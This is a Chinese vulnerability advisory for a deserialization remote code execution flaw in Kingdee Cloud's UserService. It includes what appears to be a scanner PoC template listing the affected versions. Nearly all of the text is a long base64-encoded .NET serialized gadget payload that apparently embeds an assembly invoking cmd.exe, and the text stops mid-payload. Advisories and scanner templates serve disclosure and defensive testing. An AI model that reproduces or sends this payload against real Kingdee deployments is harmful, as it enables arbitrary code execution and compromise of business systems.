kingdee-cloud-user-deserialization-rce: 金蝶云星空 UserService 反序列化远程代码执行

日期: 2025-09-01 | 影响软件: kingdee cloud | POC: 已公开

漏洞描述

金蝶云星空 UserService 存在反序列化远程代码执行漏洞,攻击者可通过构造恶意的请求参数,通过反序列化漏洞执行任意代码。

PoC代码[已公开]

id: kingdee-cloud-user-deserialization-rce

info:
  name: 金蝶云星空 UserService 反序列化远程代码执行
  author: zan8in
  severity: critical
  verified: true
  description: |-
    金蝶云星空 UserService 存在反序列化远程代码执行漏洞,攻击者可通过构造恶意的请求参数,通过反序列化漏洞执行任意代码。
  affected: |-
    金蝶云星空 6.x <= 6.2.1012.4
    7.0.352.16 <= 金蝶云星空 7.x <= 7.7.0.20211110
    8.0.0.202205 <= 金蝶云星空 8.x <= 8.1.0.20221110
  solutions: 升级到最新版本
  reference:
    - https://mp.weixin.qq.com/s/m8Z7pRjETAFw3Akk1ZETLw
  tags: kingdee,rce,deserialization
  created: 2024/11/19

set:
  payloadBody: base64Decode("eyJhcDAiOiJBQUVBQUFELy8vLy9BUUFBQUFBQUFBQUVBUUFBQUg5VGVYTjBaVzB1UTI5c2JHVmpkR2x2Ym5NdVIyVnVaWEpwWXk1TWFYTjBZREZiVzFONWMzUmxiUzVQWW1wbFkzUXNJRzF6WTI5eWJHbGlMQ0JXWlhKemFXOXVQVFF1TUM0d0xqQXNJRU4xYkhSMWNtVTlibVYxZEhKaGJDd2dVSFZpYkdsalMyVjVWRzlyWlc0OVlqYzNZVFZqTlRZeE9UTTBaVEE0T1YxZEF3QUFBQVpmYVhSbGJYTUZYM05wZW1VSVgzWmxjbk5wYjI0RkFBQUlDQWtDQUFBQUNnQUFBQW9BQUFBUUFnQUFBQkFBQUFBSkF3QUFBQWtFQUFBQUNRVUFBQUFKQmdBQUFBa0hBQUFBQ1FnQUFBQUpDUUFBQUFrS0FBQUFDUXNBQUFBSkRBQUFBQTBHQndNQUFBQUJBUUFBQUFFQUFBQUhBZ2tOQUFBQURBNEFBQUJoVTNsemRHVnRMbGR2Y210bWJHOTNMa052YlhCdmJtVnVkRTF2WkdWc0xDQldaWEp6YVc5dVBUUXVNQzR3TGpBc0lFTjFiSFIxY21VOWJtVjFkSEpoYkN3Z1VIVmliR2xqUzJWNVZHOXJaVzQ5TXpGaVpqTTROVFpoWkRNMk5HVXpOUVVFQUFBQWFsTjVjM1JsYlM1WGIzSnJabXh2ZHk1RGIyMXdiMjVsYm5STmIyUmxiQzVUWlhKcFlXeHBlbUYwYVc5dUxrRmpkR2wyYVhSNVUzVnljbTluWVhSbFUyVnNaV04wYjNJclQySnFaV04wVTNWeWNtOW5ZWFJsSzA5aWFtVmpkRk5sY21saGJHbDZaV1JTWldZQ0FBQUFCSFI1Y0dVTGJXVnRZbVZ5UkdGMFlYTURCUjlUZVhOMFpXMHVWVzVwZEhsVFpYSnBZV3hwZW1GMGFXOXVTRzlzWkdWeURnQUFBQWtQQUFBQUNSQUFBQUFCQlFBQUFBUUFBQUFKRVFBQUFBa1NBQUFBQVFZQUFBQUVBQUFBQ1JNQUFBQUpGQUFBQUFFSEFBQUFCQUFBQUFrVkFBQUFDUllBQUFBQkNBQUFBQVFBQUFBSkZ3QUFBQWtZQUFBQUFRa0FBQUFFQUFBQUNSa0FBQUFKR2dBQUFBRUtBQUFBQkFBQUFBa2JBQUFBQ1J3QUFBQUJDd0FBQUFRQUFBQUpIUUFBQUFrZUFBQUFCQXdBQUFBY1UzbHpkR1Z0TGtOdmJHeGxZM1JwYjI1ekxraGhjMmgwWVdKc1pRY0FBQUFLVEc5aFpFWmhZM1J2Y2dkV1pYSnphVzl1Q0VOdmJYQmhjbVZ5RUVoaGMyaERiMlJsVUhKdmRtbGtaWElJU0dGemFGTnBlbVVFUzJWNWN3WldZV3gxWlhNQUFBTURBQVVGQ3dnY1UzbHpkR1Z0TGtOdmJHeGxZM1JwYjI1ekxrbERiMjF3WVhKbGNpUlRlWE4wWlcwdVEyOXNiR1ZqZEdsdmJuTXVTVWhoYzJoRGIyUmxVSEp2ZG1sa1pYSUk3RkU0UHdJQUFBQUtDZ01BQUFBSkh3QUFBQWtnQUFBQUR3MEFBQUFBRUFBQUFrMWFrQUFEQUFBQUJBQUFBUC8vQUFDNEFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUlBQUFBQU9IN29PQUxRSnpTRzRBVXpOSVZSb2FYTWdjSEp2WjNKaGJTQmpZVzV1YjNRZ1ltVWdjblZ1SUdsdUlFUlBVeUJ0YjJSbExnME5DaVFBQUFBQUFBQUFVRVVBQUV3QkF3Q2htWUpnQUFBQUFBQUFBQURnQUFJaEN3RUxBQUFJQUFBQUJnQUFBQUFBQU40bUFBQUFJQUFBQUVBQUFBQUFBQkFBSUFBQUFBSUFBQVFBQUFBQUFBQUFCQUFBQUFBQUFBQUFnQUFBQUFJQUFBQUFBQUFEQUVDRkFBQVFBQUFRQUFBQUFCQUFBQkFBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUNRSmdBQVN3QUFBQUJBQUFDb0FnQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQmdBQUFNQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUFnQUFBQUFBQUFBQUFBQUFBZ2dBQUJJQUFBQUFBQUFBQUFBQUFBdWRHVjRkQUFBQU9RR0FBQUFJQUFBQUFnQUFBQUNBQUFBQUFBQUFBQUFBQUFBQUFBZ0FBQmdMbkp6Y21NQUFBQ29BZ0FBQUVBQUFBQUVBQUFBQ2dBQUFBQUFBQUFBQUFBQUFBQUFRQUFBUUM1eVpXeHZZd0FBREFBQUFBQmdBQUFBQWdBQUFBNEFBQUFBQUFBQUFBQUFBQUFBQUVBQUFFSUFBQUFBQUFBQUFBQUFBQUFBQUFBQXdDWUFBQUFBQUFCSUFBQUFBZ0FGQURBaEFBQmdCUUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBYk1BTUF3d0FBQUFFQUFCRUNLQU1BQUFvb0JBQUFDZ29HYndVQUFBcHZCZ0FBQ2dadkJ3QUFDbThJQUFBS2N3a0FBQW9MQjI4S0FBQUtjZ0VBQUhCdkN3QUFDZ1p2REFBQUNtOE5BQUFLY2hFQUFIQnZEZ0FBQ2d3SGJ3b0FBQXB5R1FBQWNBZ29Ed0FBQ204UUFBQUtCMjhLQUFBS0YyOFJBQUFLQjI4S0FBQUtGMjhTQUFBS0IyOEtBQUFLRm04VEFBQUtCMjhVQUFBS0pnZHZGUUFBQ204V0FBQUtEUVp2QndBQUNnbHZGd0FBQ3Q0REp0NEFCbThIQUFBS2J4Z0FBQW9HYndjQUFBcHZHUUFBQ2lvQUFSQUFBQUFBSWdDSHFRQUREZ0FBQVVKVFNrSUJBQUVBQUFBQUFBd0FBQUIyTkM0d0xqTXdNekU1QUFBQUFBVUFiQUFBQUx3QkFBQWpmZ0FBS0FJQUFIUUNBQUFqVTNSeWFXNW5jd0FBQUFDY0JBQUFKQUFBQUNOVlV3REFCQUFBRUFBQUFDTkhWVWxFQUFBQTBBUUFBSkFBQUFBalFteHZZZ0FBQUFBQUFBQUNBQUFCUnhRQ0FBa0FBQUFBK2lVekFCWUFBQUVBQUFBT0FBQUFBZ0FBQUFFQUFBQVpBQUFBQWdBQUFBRUFBQUFCQUFBQUF3QUFBQUFBQ2dBQkFBQUFBQUFHQUNrQUlnQUdBRllBTmdBR0FIWUFOZ0FLQUtnQW5RQUtBTUFBblFBS0FPZ0FuUUFPQUJzQkNBRU9BQ01CQ0FFS0FFOEJuUUFPQUlZQlp3RUdBSzhCSWdBR0FDUUNHZ0lHQUVRQ0dnSUdBR2tDSWdBQUFBQUFBUUFBQUFBQUFRQUJBQUFBRUFBWEFBQUFCUUFCQUFFQVVDQUFBQUFBaGhnd0FBb0FBUUFSQURBQURnQVpBREFBQ2dBSkFEQUFDZ0FoQUxRQUhBQWhBTklBSVFBcEFOMEFDZ0FoQVBVQUpnQXhBQUlCQ2dBNUFEQUFDZ0E1QURRQkt3QkJBRUlCTUFBaEFGc0JOUUJKQUpvQk9nQlJBS1lCUHdCWkFMWUJSQUJCQUwwQk1BQkJBTXNCU2dCQkFPWUJTZ0JCQUFBQ1NnQTVBQlFDVHdBNUFERUNVd0JwQUU4Q1dBQXhBRmtDTUFBeEFGOENDZ0F4QUdVQ0NnQXVBQXNBWlFBdUFCTUFiZ0JjQUFTQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUpRQUFBQUVBQUFBQUFBQUFBQUFBQUFCQUJrQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUJNQW5RQUFBQUFBQkFBQUFBQUFBQUFBQUFBQUFRQWlBQUFBQUFBQUFBQThUVzlrZFd4bFBnQjBlR3hrY1hZeWVDNWtiR3dBUlFCdGMyTnZjbXhwWWdCVGVYTjBaVzBBVDJKcVpXTjBBQzVqZEc5eUFGTjVjM1JsYlM1U2RXNTBhVzFsTGtOdmJYQnBiR1Z5VTJWeWRtbGpaWE1BUTI5dGNHbHNZWFJwYjI1U1pXeGhlR0YwYVc5dWMwRjBkSEpwWW5WMFpRQlNkVzUwYVcxbFEyOXRjR0YwYVdKcGJHbDBlVUYwZEhKcFluVjBaUUIwZUd4a2NYWXllQUJUZVhOMFpXMHVWMlZpQUVoMGRIQkRiMjUwWlhoMEFHZGxkRjlEZFhKeVpXNTBBRWgwZEhCVFpYSjJaWEpWZEdsc2FYUjVBR2RsZEY5VFpYSjJaWElBUTJ4bFlYSkZjbkp2Y2dCSWRIUndVbVZ6Y0c5dWMyVUFaMlYwWDFKbGMzQnZibk5sQUVOc1pXRnlBRk41YzNSbGJTNUVhV0ZuYm05emRHbGpjd0JRY205alpYTnpBRkJ5YjJObGMzTlRkR0Z5ZEVsdVptOEFaMlYwWDFOMFlYSjBTVzVtYndCelpYUmZSbWxzWlU1aGJXVUFTSFIwY0ZKbGNYVmxjM1FBWjJWMFgxSmxjWFZsYzNRQVUzbHpkR1Z0TGtOdmJHeGxZM1JwYjI1ekxsTndaV05wWVd4cGVtVmtBRTVoYldWV1lXeDFaVU52Ykd4bFkzUnBiMjRBWjJWMFgwaGxZV1JsY25NQVoyVjBYMGwwWlcwQVUzUnlhVzVuQUVOdmJtTmhkQUJ6WlhSZlFYSm5kVzFsYm5SekFITmxkRjlTWldScGNtVmpkRk4wWVc1a1lYSmtUM1YwY0hWMEFITmxkRjlTWldScGNtVmpkRk4wWVc1a1lYSmtSWEp5YjNJQWMyVjBYMVZ6WlZOb1pXeHNSWGhsWTNWMFpRQlRkR0Z5ZEFCVGVYTjBaVzB1U1U4QVUzUnlaV0Z0VW1WaFpHVnlBR2RsZEY5VGRHRnVaR0Z5WkU5MWRIQjFkQUJVWlhoMFVtVmhaR1Z5QUZKbFlXUlViMFZ1WkFCWGNtbDBaUUJHYkhWemFBQkZibVFBUlhoalpYQjBhVzl1QUFBQUQyTUFiUUJrQUM0QVpRQjRBR1VBQUFkakFHMEFaQUFBQnk4QVl3QWdBQUFBQUFDem1tRzVuYkZnUmFoZW5RY0tGdkpIQUFpM2VseFdHVFRnaVFNZ0FBRUVJQUVCQ0Fpd1AxOS9FZFVLT2dRQUFCSVJCQ0FBRWhVRUlBQVNHUVFnQUJJaEJDQUJBUTRFSUFBU0pRUWdBQklwQkNBQkRnNEZBQUlPRGc0RUlBRUJBZ01nQUFJRUlBQVNNUU1nQUE0SUJ3UVNFUklkRGc0SUFRQUlBQUFBQUFBZUFRQUJBRlFDRmxkeVlYQk9iMjVGZUdObGNIUnBiMjVVYUhKdmQzTUJBQUFBdUNZQUFBQUFBQUFBQUFBQXppWUFBQUFnQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFNQW1BQUFBQUFBQUFBQmZRMjl5Ukd4c1RXRnBiZ0J0YzJOdmNtVmxMbVJzYkFBQUFBQUEveVVBSUFBUUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBRUFFQUFBQUJnQUFJQUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFRQUFBREFBQUlBQUFBQUFBQUFBQUFBQUFBQUFBQUVBQUFBQUFFZ0FBQUJZUUFBQVRBSUFBQUFBQUFBQUFBQUFUQUkwQUFBQVZnQlRBRjhBVmdCRkFGSUFVd0JKQUU4QVRnQmZBRWtBVGdCR0FFOEFBQUFBQUwwRTcvNEFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBQUFBRDhBQUFBQUFBQUFCQUFBQUFJQUFBQUFBQUFBQUFBQUFBQUFBQUJFQUFBQUFRQldBR0VBY2dCR0FHa0FiQUJsQUVrQWJnQm1BRzhBQUFBQUFDUUFCQUFBQUZRQWNnQmhBRzRBY3dCc0FHRUFkQUJwQUc4QWJnQUFBQUFBQUFDd0JLd0JBQUFCQUZNQWRBQnlBR2tBYmdCbkFFWUFhUUJzQUdVQVNRQnVBR1lBYndBQUFJZ0JBQUFCQURBQU1BQXdBREFBTUFBMEFHSUFNQUFBQUN3QUFnQUJBRVlBYVFCc0FHVUFSQUJsQUhNQVl3QnlBR2tBY0FCMEFHa0Fid0J1QUFBQUFBQWdBQUFBTUFBSUFBRUFSZ0JwQUd3QVpRQldBR1VBY2dCekFHa0Fid0J1QUFBQUFBQXdBQzRBTUFBdUFEQUFMZ0F3QUFBQVBBQU5BQUVBU1FCdUFIUUFaUUJ5QUc0QVlRQnNBRTRBWVFCdEFHVUFBQUIwQUhnQWJBQmtBSEVBZGdBeUFIZ0FMZ0JrQUd3QWJBQUFBQUFBS0FBQ0FBRUFUQUJsQUdjQVlRQnNBRU1BYndCd0FIa0FjZ0JwQUdjQWFBQjBBQUFBSUFBQUFFUUFEUUFCQUU4QWNnQnBBR2NBYVFCdUFHRUFiQUJHQUdrQWJBQmxBRzRBWVFCdEFHVUFBQUIwQUhnQWJBQmtBSEVBZGdBeUFIZ0FMZ0JrQUd3QWJBQUFBQUFBTkFBSUFBRUFVQUJ5QUc4QVpBQjFBR01BZEFCV0FHVUFjZ0J6QUdrQWJ3QnVBQUFBTUFBdUFEQUFMZ0F3QUM0QU1BQUFBRGdBQ0FBQkFFRUFjd0J6QUdVQWJRQmlBR3dBZVFBZ0FGWUFaUUJ5QUhNQWFRQnZBRzRBQUFBd0FDNEFNQUF1QURBQUxnQXdBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQ0FBQUF3QUFBRGdOZ0FBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUVEd0FBQUI5VGVYTjBaVzB1Vlc1cGRIbFRaWEpwWVd4cGVtRjBhVzl1U0c5c1pHVnlBd0FBQUFSRVlYUmhDVlZ1YVhSNVZIbHdaUXhCYzNObGJXSnNlVTVoYldVQkFBRUlCaUVBQUFEK0FWTjVjM1JsYlM1TWFXNXhMa1Z1ZFcxbGNtRmliR1VyVjJobGNtVlRaV3hsWTNSRmJuVnRaWEpoWW14bFNYUmxjbUYwYjNKZ01sdGJVM2x6ZEdWdExrSjVkR1ZiWFN3Z2JYTmpiM0pzYVdJc0lGWmxjbk5wYjI0OU5DNHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajFpTnpkaE5XTTFOakU1TXpSbE1EZzVYU3hiVTNsemRHVnRMbEpsWm14bFkzUnBiMjR1UVhOelpXMWliSGtzSUcxelkyOXliR2xpTENCV1pYSnphVzl1UFRRdU1DNHdMakFzSUVOMWJIUjFjbVU5Ym1WMWRISmhiQ3dnVUhWaWJHbGpTMlY1Vkc5clpXNDlZamMzWVRWak5UWXhPVE0wWlRBNE9WMWRCQUFBQUFZaUFBQUFUbE41YzNSbGJTNURiM0psTENCV1pYSnphVzl1UFRRdU1DNHdMakFzSUVOMWJIUjFjbVU5Ym1WMWRISmhiQ3dnVUhWaWJHbGpTMlY1Vkc5clpXNDlZamMzWVRWak5UWXhPVE0wWlRBNE9SQVFBQUFBQndBQUFBa0RBQUFBQ2dra0FBQUFDZ2dJQUFBQUFBb0lDQUVBQUFBQkVRQUFBQThBQUFBR0pRQUFBUFVDVTNsemRHVnRMa3hwYm5FdVJXNTFiV1Z5WVdKc1pTdFhhR1Z5WlZObGJHVmpkRVZ1ZFcxbGNtRmliR1ZKZEdWeVlYUnZjbUF5VzF0VGVYTjBaVzB1VW1WbWJHVmpkR2x2Ymk1QmMzTmxiV0pzZVN3Z2JYTmpiM0pzYVdJc0lGWmxjbk5wYjI0OU5DNHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajFpTnpkaE5XTTFOakU1TXpSbE1EZzVYU3hiVTNsemRHVnRMa052Ykd4bFkzUnBiMjV6TGtkbGJtVnlhV011U1VWdWRXMWxjbUZpYkdWZ01WdGJVM2x6ZEdWdExsUjVjR1VzSUcxelkyOXliR2xpTENCV1pYSnphVzl1UFRRdU1DNHdMakFzSUVOMWJIUjFjbVU5Ym1WMWRISmhiQ3dnVUhWaWJHbGpTMlY1Vkc5clpXNDlZamMzWVRWak5UWXhPVE0wWlRBNE9WMWRMQ0J0YzJOdmNteHBZaXdnVm1WeWMybHZiajAwTGpBdU1DNHdMQ0JEZFd4MGRYSmxQVzVsZFhSeVlXd3NJRkIxWW14cFkwdGxlVlJ2YTJWdVBXSTNOMkUxWXpVMk1Ua3pOR1V3T0RsZFhRUUFBQUFKSWdBQUFCQVNBQUFBQndBQUFBa0VBQUFBQ2drb0FBQUFDZ2dJQUFBQUFBb0lDQUVBQUFBQkV3QUFBQThBQUFBR0tRQUFBTjhEVTNsemRHVnRMa3hwYm5FdVJXNTFiV1Z5WVdKc1pTdFhhR1Z5WlZObGJHVmpkRVZ1ZFcxbGNtRmliR1ZKZEdWeVlYUnZjbUF5VzF0VGVYTjBaVzB1UTI5c2JHVmpkR2x2Ym5NdVIyVnVaWEpwWXk1SlJXNTFiV1Z5WVdKc1pXQXhXMXRUZVhOMFpXMHVWSGx3WlN3Z2JYTmpiM0pzYVdJc0lGWmxjbk5wYjI0OU5DNHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajFpTnpkaE5XTTFOakU1TXpSbE1EZzVYVjBzSUcxelkyOXliR2xpTENCV1pYSnphVzl1UFRRdU1DNHdMakFzSUVOMWJIUjFjbVU5Ym1WMWRISmhiQ3dnVUhWaWJHbGpTMlY1Vkc5clpXNDlZamMzWVRWak5UWXhPVE0wWlRBNE9WMHNXMU41YzNSbGJTNURiMnhzWldOMGFXOXVjeTVIWlc1bGNtbGpMa2xGYm5WdFpYSmhkRzl5WURGYlcxTjVjM1JsYlM1VWVYQmxMQ0J0YzJOdmNteHBZaXdnVm1WeWMybHZiajAwTGpBdU1DNHdMQ0JEZFd4MGRYSmxQVzVsZFhSeVlXd3NJRkIxWW14cFkwdGxlVlJ2YTJWdVBXSTNOMkUxWXpVMk1Ua3pOR1V3T0RsZFhTd2diWE5qYjNKc2FXSXNJRlpsY25OcGIyNDlOQzR3TGpBdU1Dd2dRM1ZzZEhWeVpUMXVaWFYwY21Gc0xDQlFkV0pzYVdOTFpYbFViMnRsYmoxaU56ZGhOV00xTmpFNU16UmxNRGc1WFYwRUFBQUFDU0lBQUFBUUZBQUFBQWNBQUFBSkJRQUFBQW9KTEFBQUFBb0lDQUFBQUFBS0NBZ0JBQUFBQVJVQUFBQVBBQUFBQmkwQUFBRG1BbE41YzNSbGJTNU1hVzV4TGtWdWRXMWxjbUZpYkdVclYyaGxjbVZUWld4bFkzUkZiblZ0WlhKaFlteGxTWFJsY21GMGIzSmdNbHRiVTNsemRHVnRMa052Ykd4bFkzUnBiMjV6TGtkbGJtVnlhV011U1VWdWRXMWxjbUYwYjNKZ01WdGJVM2x6ZEdWdExsUjVjR1VzSUcxelkyOXliR2xpTENCV1pYSnphVzl1UFRRdU1DNHdMakFzSUVOMWJIUjFjbVU5Ym1WMWRISmhiQ3dnVUhWaWJHbGpTMlY1Vkc5clpXNDlZamMzWVRWak5UWXhPVE0wWlRBNE9WMWRMQ0J0YzJOdmNteHBZaXdnVm1WeWMybHZiajAwTGpBdU1DNHdMQ0JEZFd4MGRYSmxQVzVsZFhSeVlXd3NJRkIxWW14cFkwdGxlVlJ2YTJWdVBXSTNOMkUxWXpVMk1Ua3pOR1V3T0RsZExGdFRlWE4wWlcwdVZIbHdaU3dnYlhOamIzSnNhV0lzSUZabGNuTnBiMjQ5TkM0d0xqQXVNQ3dnUTNWc2RIVnlaVDF1WlhWMGNtRnNMQ0JRZFdKc2FXTkxaWGxVYjJ0bGJqMWlOemRoTldNMU5qRTVNelJsTURnNVhWMEVBQUFBQ1NJQUFBQVFGZ0FBQUFjQUFBQUpCZ0FBQUFrd0FBQUFDVEVBQUFBS0NBZ0FBQUFBQ2dnSUFRQUFBQUVYQUFBQUR3QUFBQVl5QUFBQTd3RlRlWE4wWlcwdVRHbHVjUzVGYm5WdFpYSmhZbXhsSzFkb1pYSmxVMlZzWldOMFJXNTFiV1Z5WVdKc1pVbDBaWEpoZEc5eVlESmJXMU41YzNSbGJTNVVlWEJsTENCdGMyTnZjbXhwWWl3Z1ZtVnljMmx2YmowMExqQXVNQzR3TENCRGRXeDBkWEpsUFc1bGRYUnlZV3dzSUZCMVlteHBZMHRsZVZSdmEyVnVQV0kzTjJFMVl6VTJNVGt6TkdVd09EbGRMRnRUZVhOMFpXMHVUMkpxWldOMExDQnRjMk52Y214cFlpd2dWbVZ5YzJsdmJqMDBMakF1TUM0d0xDQkRkV3gwZFhKbFBXNWxkWFJ5WVd3c0lGQjFZbXhwWTB0bGVWUnZhMlZ1UFdJM04yRTFZelUyTVRrek5HVXdPRGxkWFFRQUFBQUpJZ0FBQUJBWUFBQUFCd0FBQUFrSEFBQUFDZ2sxQUFBQUNnZ0lBQUFBQUFvSUNBRUFBQUFCR1FBQUFBOEFBQUFHTmdBQUFDbFRlWE4wWlcwdVYyVmlMbFZKTGxkbFlrTnZiblJ5YjJ4ekxsQmhaMlZrUkdGMFlWTnZkWEpqWlFRQUFBQUdOd0FBQUUxVGVYTjBaVzB1VjJWaUxDQldaWEp6YVc5dVBUUXVNQzR3TGpBc0lFTjFiSFIxY21VOWJtVjFkSEpoYkN3Z1VIVmliR2xqUzJWNVZHOXJaVzQ5WWpBelpqVm1OMll4TVdRMU1HRXpZUkFhQUFBQUJ3QUFBQWtJQUFBQUNBZ0FBQUFBQ0FnS0FBQUFDQUVBQ0FFQUNBRUFDQWdBQUFBQUFSc0FBQUFQQUFBQUJqa0FBQUFwVTNsemRHVnRMa052YlhCdmJtVnVkRTF2WkdWc0xrUmxjMmxuYmk1RVpYTnBaMjVsY2xabGNtSUVBQUFBQmpvQUFBQkpVM2x6ZEdWdExDQldaWEp6YVc5dVBUUXVNQzR3TGpBc0lFTjFiSFIxY21VOWJtVjFkSEpoYkN3Z1VIVmliR2xqUzJWNVZHOXJaVzQ5WWpjM1lUVmpOVFl4T1RNMFpUQTRPUkFjQUFBQUJRQUFBQTBDQ1RzQUFBQUlDQU1BQUFBSkN3QUFBQUVkQUFBQUR3QUFBQVk5QUFBQU5GTjVjM1JsYlM1U2RXNTBhVzFsTGxKbGJXOTBhVzVuTGtOb1lXNXVaV3h6TGtGblozSmxaMkYwWlVScFkzUnBiMjVoY25rRUFBQUFCajRBQUFCTGJYTmpiM0pzYVdJc0lGWmxjbk5wYjI0OU5DNHdMakF1TUN3Z1EzVnNkSFZ5WlQxdVpYVjBjbUZzTENCUWRXSnNhV05MWlhsVWIydGxiajFpTnpkaE5XTTFOakU1TXpSbE1EZzVFQjRBQUFBQkFBQUFDUWtBQUFBUUh3QUFBQUlBQUFBSkNnQUFBQWtLQUFBQUVDQUFBQUFDQUFBQUJrRUFBQUFBQ1VFQUFBQUVKQUFBQUNKVGVYTjBaVzB1UkdWc1pXZGhkR1ZUWlhKcFlXeHBlbUYwYVc5dVNHOXNaR1Z5QWdBQUFBaEVaV3hsWjJGMFpRZHRaWFJvYjJRd0F3TXdVM2x6ZEdWdExrUmxiR1ZuWVhSbFUyVnlhV0ZzYVhwaGRHbHZia2h2YkdSbGNpdEVaV3hsWjJGMFpVVnVkSEo1TDFONWMzUmxiUzVTWldac1pXTjBhVzl1TGsxbGJXSmxja2x1Wm05VFpYSnBZV3hwZW1GMGFXOXVTRzlzWkdWeUNVSUFBQUFKUXdBQUFBRW9BQUFBSkFBQUFBbEVBQUFBQ1VVQUFBQUJMQUFBQUNRQUFBQUpSZ0FBQUFsSEFBQUFBVEFBQUFBa0FBQUFDVWdBQUFBSlNRQUFBQUV4QUFBQUpBQUFBQWxLQUFBQUNVc0FBQUFCTlFBQUFDUUFBQUFKVEFBQUFBbE5BQUFBQVRzQUFBQUVBQUFBQ1U0QUFBQUpUd0FBQUFSQ0FBQUFNRk41YzNSbGJTNUVaV3hsWjJGMFpWTmxjbWxoYkdsNllYUnBiMjVJYjJ4a1pYSXJSR1ZzWldkaGRHVkZiblJ5ZVFjQUFBQUVkSGx3WlFoaGMzTmxiV0pzZVFaMFlYSm5aWFFTZEdGeVoyVjBWSGx3WlVGemMyVnRZbXg1RG5SaGNtZGxkRlI1Y0dWT1lXMWxDbTFsZEdodlpFNWhiV1VOWkdWc1pXZGhkR1ZGYm5SeWVRRUJBZ0VCQVFNd1UzbHpkR1Z0TGtSbGJHVm5ZWFJsVTJWeWFXRnNhWHBoZEdsdmJraHZiR1JsY2l0RVpXeGxaMkYwWlVWdWRISjVCbEFBQUFEVkFWT